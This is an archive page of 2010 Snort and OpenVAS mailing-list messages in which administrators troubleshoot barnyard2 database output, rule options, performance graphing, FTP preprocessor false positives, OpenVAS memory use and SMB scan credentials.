(Dumpcap is the program used by Wireshark to capture data).

Snort — Everyone's favorite open source IDS, Snort. This archive combines the snort-announce, snort-devel, snort-users, and snort-sigs lists.

Re: snort 2.8.6.1/base/ barnyard2 unified2 classification_id Lawrence R. Hughes, Sr. (Sep 02)
Hi Paul,

Thanks for your reply, going on your description:

paul> The classification id is "embedded" in the db already. Each active
signature
paul> is registered with its class_id when it's read into snort during
startup. When
paul> a signature triggers, its sig_name ties to all the other values.

I cleared my mysql.log, started barnyard2 then snort.

I checked the mysql.log and it did not show where barnyard did anything...

Re: snort 2.8.6.1/base/ barnyard2 unified2 classification_id Paul Schmehl (Sep 02)
--On Thursday, September 02, 2010 14:35:42 -0400 "Lawrence R. Hughes, Sr."
<lhughes () safemedia com> wrote:

[snipped details]

The classification id is "embedded" in the db already. Each active signature
is registered with its class_id when it's read into snort during startup. When
a signature triggers, its sig_name ties to all the other values.

mysql> describe sig_class;...

Re: Does 'ttl' allow less-than-or-equal and greater-than-or-equal? Joshua . Kinard (Sep 02)
Russ,

Awesome! Glad to be of assistance.

Cheers!,

--J

-----Original Message-----
From: Russ Combs [mailto:rcombs () sourcefire com]
Sent: Thursday, September 02, 2010 10:01 AM
To: Kinard, Joshua A
Cc: snort-devel () lists sourceforge net
Subject: Re: [Snort-devel] Does 'ttl' allow less-than-or-equal and
greater-than-or-equal?

Russ,

Thanks for the info! Should I contact someone at SF directly to
highlight...

Re: Performance Monitor Graphing Tool Joel Esler (Sep 02)
I believe there is an archived copy on brvenik's code site on snort.org.

Sent from my iPhone

------------------------------------------------------------------------------
This SF.net Dev2Dev email is sponsored by:

Show off your parallel programming skills.
Enter the Intel(R) Threading Challenge 2010.
http://p.sf.net/sfu/intel-thread-sfd_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge...

Re: Performance Monitor Graphing Tool JJ Cummings (Sep 02)
I'm building an updated one currently... See my blog post from yesterday here: http://global-security.blogspot.com

Comments/desires(for the tool) are all welcome. I'll likely be publishing some initial code shortly!

JJC

Sent from the iRoad

------------------------------------------------------------------------------
This SF.net Dev2Dev email is sponsored by:

Show off your parallel programming skills.
Enter the Intel(R) Threading Challenge...

Re: Performance Monitor Graphing Tool Eoin Miller (Sep 02)
On 9/2/2010 6:46 PM, Greg Lane wrote:

I just end up using GNUPlot + cron. I wrote up a quick blog on it if you
want to see some examles:

http://trojanedbinaries.com/blog/?p=24

-- Eoin
------------------------------------------------------------------------------
This SF.net Dev2Dev email is sponsored by:

Show off your parallel programming skills.
Enter the Intel(R) Threading Challenge 2010.
http://p.sf.net/sfu/intel-thread-sfd...

Performance Monitor Graphing Tool Greg Lane (Sep 02)
Does anybody had a good location to obtain a good perfmonitor graph tool for
snort? Every link that I have tried doesn't seem to work and nothing is
available.

Greg Lane

IT Manager

Lane Enterprises

Email: greglane () laneconstinc com

Phone: (228)872-2414

------------------------------------------------------------------------------
This SF.net Dev2Dev email is sponsored by:

Show off your parallel programming skills.
Enter the Intel(R)...

snort 2.8.6.1/base/ barnyard2 unified2 classification_id Lawrence R. Hughes, Sr. (Sep 02)
Hi,

I have noticed that snort populates the 32 bit field for the classification id in it's unified2 output, but barnyard2
never inserts the classification id into the database?

Below is a snapshot from our mysql.log of all transactions between barnyard2 and mysql:

554 Query BEGIN

554 Query SELECT sig_id FROM signature WHERE sig_name = 'POLICY RDP attempted administrator connection request ' AND
sig_rev = 4 AND sig_sid = 4060 AND sig_gid = 1...

Snort 2.9.0 and Intel QuickAssist Document Retention (Sep 02)
Hello,

What types of hardware devices are the Snort Community using that takes
advantage of the Intel QuickAssist feature added to Snort 2.9.0?

Thanks,

Doc
------------------------------------------------------------------------------
This SF.net Dev2Dev email is sponsored by:

Show off your parallel programming skills.
Enter the Intel(R) Threading Challenge 2010.
http://p.sf.net/sfu/intel-thread-sfd...

Re: Does 'ttl' allow less-than-or-equal and greater-than-or-equal? Russ Combs (Sep 02)
A bug is open on this and the fix (including support for <= and >=) should
be out soon.

The manual was already fixed following your earlier email. Sorry you didn't
get a response then.

There is no public bug tracker (other than this list). But as these bugs
work their way through the system, additional steps are taken to ensure
related things are updated, including SF manuals.

Thanks for pointing out these issues.

Russ...

Rule 3:13476 direction? Jefferson, Shawn (Sep 01)
Hi,

I'm looking at a few alerts from the so_rule 3:13476, but it looks like the direction is wrong...

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"WEB-MISC Microsoft IIS HTMLEncode Unicode string buffer
overflow"; sid:13476; gid:3; rev:2; classtype:web-application-attack; reference:cve,2008-0075;
reference:url,www.microsoft.com/technet/security/bulletin/ms08-006.mspx; metadata: engine shared, soid 3|13476;)

(and...

preprocessor ftp_telnet_protocol: FP on spaces Castle, Shane (Sep 01)
The preprocessor ftp_telnet_protocol always FPs when there is a space in
(e.g.) the CWD command (or any other, for that matter). How do I stop
these alerts? The README.ftptelnet is of no help here. Reading the guide
PDF indicates that I might be able to override this with

cmd_validity CWD < string > (in the case of the CWD FP)

but this is not clear. I suppose I could try it...

Re: how to create testing data files?? Russ Combs (Aug 31)
If you really want to go from text strings straight into Snort, abcip (
http://sourceforge.net/projects/abcip/ ) now includes a DAQ and a raw input
mode, so you can so stuff like this:

Terminal:
snort --daq abc --daq-var raw -i tty

Redirect:
snort --daq abc --daq-var raw -i tty < test.txt

Readback:
snort --daq abc --daq-var raw -r test.txt

Russ
------------------------------------------------------------------------------
This...

Re: A few questions regarding Solaris Mike Lococo (Aug 31)
I add a userparameter to the zabbix_agentd.conf file as follows (ignore
linebreaks, it should all be on one line):

UserParameter=snort.perfmon[*],tail -n1 '/var/log/snort
/$1/snort.stats' | awk -F ',' '{print $ $2}'

This uses tail to grab the last line of a stats file, and pipes that
line into awk in order to print a particular column. $1 and $2 are
zabbix variables that allow you to create "items" that monitor different...

Re: A few questions regarding Solaris Robert Riskin (Aug 31)
Mike thank you very much for the info, i'm curious how you have Zabbix watch
your perfmon file with certain columns. I use Zabbix in a separate
environment (and I love it) but am planning on deploying in production by
year-end.

Yeah i'm going to rebuild the system with a supported SO_RULES platform.

I was thinking about going for a sourcefire box but I really enjoy building
and learning this stuff from the ground up, it's very informative and...

OpenVAS — Development and announcements regarding OpenVAS, a free network security scanner which forked from Nessus. This is a combination of the English openvas-announce, openvas-devel, openvas-discuss, and openvas-plugins lists.

Re: Memory footprint for openvassd Jan-Oliver Wagner (Sep 02)
thanks for starting to work on this.
There are many, many ways to optimize still left.
E.g. it is not really necessary to keep the description
in memory at all.
Unfortunately the code we inherited is not really helpful
to allow changes easily.

I planned to work on this in more detail after we have
the rest of the framework in place. Seems you are in
need of this earlier.

My actual idea to get the memory footprint low is
to have openvassd only...

Re: Memory footprint for openvassd Thomas Reinke (Sep 02)
Jan-Oliver Wagner wrote:

Yes, we've noticed as we dig through the nvti* routines
and how the cache works. That being said, it's a bit
of an issue right now for us, and probably will be for
others later, if the daemon chooses to cache so much
information in memory as to make it impossible to run
any decent work load on the box. We can easily enough upgrade
memory on our boxes, but most of our platforms are
a bit older (as in a couple of years)...

Re: Memory footprint for openvassd Jan-Oliver Wagner (Sep 02)
please have in mind that OpenVAS stores more meta
information about NVTs than Nessus does.

Re: Memory footprint for openvassd Thomas Reinke (Sep 02)
Tim Brown wrote:

We're digging into it now. More nasl's doesn't really account
for the differential problem we're seeing between Nessus and
OpenVAS - since we're using the exact same test suite.
We've already added dump logic on the emalloc calls to see
what's going on, and that alone is showing a straight forward
45 Meg consumption by the time openvassd is ready to accept
connections (and that ignores the overhead of malloc itself,
which IIRC...

Re: Memory footprint for openvassd Tim Brown (Sep 02)
Wow, that sounds pretty nuts. Some of it may be attributed to more NASLs
being loaded but even so, it sounds like something is broken somewhere. Any
chance of attaching something like valgrind to it to see if there are any
obvious areas of concern?

Tim

Re: Memory footprint for openvassd Thomas Reinke (Sep 02)
Ok...have some additional information to add now -
it would seem that a raw start up of Nessus was consuming
approximately 20M. The same start-up on OpenVAS
consumes >100M. It also seems that the child processes
are constrained by the maximum size of that startup,
i.e. we never see the memory of an actual script
processing task exceed that memory usage.

The factor of 5 (approximately 4K memory consumption
per script in the test suite)...

Memory footprint for openvassd Thomas Reinke (Sep 02)
Hi all,

We're using openvas scanning daemon 3.1 only (have our own
customized client for controlling scans), and we've noticed
that with the change from nessus to openvas, the memory footprint
has ballooned in a huge way.

Currently, the typical amount of memory being consumed by
processes is averaging around 40 Meg per process, but many
tasks running over 100Meg.

We've already throttled our scan utiliziation to one third
of what it used to be,...

Re: Manager can't update/rebuild DB: database table is locked Matthew Mundell (Aug 27)
Perhaps there is an old Manager running that has the lock on the database?

Manager can't update/rebuild DB: database table is locked LC W (Aug 27)
Hello all. I've built and installed openvas-libraries-3.1.2,
openvas-scanner-3.1.0, and openvas-manager-1.0.2 from source on
RHEL5.5. I created the "om" account/certs per the README, and started
openvassd on port 9391, then tried to do a rebuild of the manager
database by running "openvasmd --sport 9391 --rebuild --verbose". If
I watch the manager log, I see that it connects to the scanner, and
then a bunch of SQL...

Re: Can't use SMB credentials Jean Mouric (Aug 27)
I'm not sure about that. I found out that my plugin folder had been
corrupted and smb authentification worked just fine when I restored it. As
for the password not showing in the logs, it may be intentional, since it
doesn't show when you do a get_config either.

2010/8/27 Lucyga Dierk <Dierk.Lucyga () cancom de>

Re: Can't use SMB credentials Lucyga Dierk (Aug 27)
Hi,

This might be related to the (yet unsolved) problem I described in my mail on August 13.
Seems like SMB passwords are generally ignored.

Dierk Lucyga

Re: Can't use SMB credentials Jean Mouric (Aug 26)
Well, my bad, I got it to work after all. It seems that my plugin folder was
corrupted : everything seems to be ok now. Thanks for the answers !

2010/8/26 Jean Mouric <j.mouric () gmail com>

Re: Can't use SMB credentials Jean Mouric (Aug 26)
I'll consider it.

How could I miss this? I changed it, but it still doesn't work though.

As I said, the lsc_credential method doesn't work either for SMB, which is
also why I think the type error above isn't the source of the problem. Is
there any difference in the handling of SMB parameters by the manager
compared to SSH? Maybe I shouldn't specify this in clear text but a specific
format?

Re: Can't use SMB credentials Matthew Mundell (Aug 26)
Doing a | xmlstarlet will probably be easier.

You could leave out the <name>, because the Manager will use the name in
the get_configs_response.

[...]

This should be of type password.

Note also that if the target has a credential associated with it, then the
Manager will also send those credentials. This could override the values
you sent here.

Re: Can't use SMB credentials Jean Mouric (Aug 26)
Oh, I just realized trimmed the slashes in my commands in my e-mail, they
actually look like :

omp -p 9391 -X "<create_target><name>my target</name><hosts>[my targets
here]</hosts></create_target>"

omp -p 9391 -X "<create_config><name>[my config name]</name><get_configs_

2010/8/26 Jean Mouric <j.mouric () gmail com>

More Lists

Related Resources

We're always looking for great network security related lists to archive. To suggest one, mail Fyodor.